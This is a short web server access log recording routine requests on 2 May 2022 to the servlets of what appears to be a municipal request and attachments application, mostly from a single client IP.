190.171.144.234 - - [02/May/2022:17:35:02 -0300] "GET /cormun/servlet/solicitudotadjuntos?dc5bcc90b84c2ced96644b859fa5679205e0f2721f4a8ab2b89862d069f7ab51,gx-no-cache=1651522924516 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:35:03 -0300] "POST /cormun/servlet/solicitudotadjuntos?a450a5ad7b38b0a4d54c5fd46a4b2f23,INS,2022,18593,,1, HTTP/1.1" 200 116
190.171.144.234 - - [02/May/2022:17:35:03 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1027
190.171.144.234 - - [02/May/2022:17:35:03 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2022,18593, HTTP/1.1" 200 10018
190.171.144.234 - - [02/May/2022:17:35:04 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2022,18593, HTTP/1.1" 200 10017
190.171.144.234 - - [02/May/2022:17:35:12 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,CA-36,true HTTP/1.1" 200 35
192.168.10.11 - - [02/May/2022:17:35:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.144.234 - - [02/May/2022:17:35:21 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8580
190.171.144.234 - - [02/May/2022:17:35:22 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8573
190.171.144.234 - - [02/May/2022:17:35:25 -0300] "POST /cormun/servlet/trsolicitudot?a450a5ad7b38b0a4d54c5fd46a4b2f23,,gx-no-cache=1651522947237 HTTP/1.1" 200 107
190.171.144.234 - - [02/May/2022:17:35:26 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2022,18593, HTTP/1.1" 200 10015
190.171.144.234 - - [02/May/2022:17:35:27 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2022,18593, HTTP/1.1" 200 10016
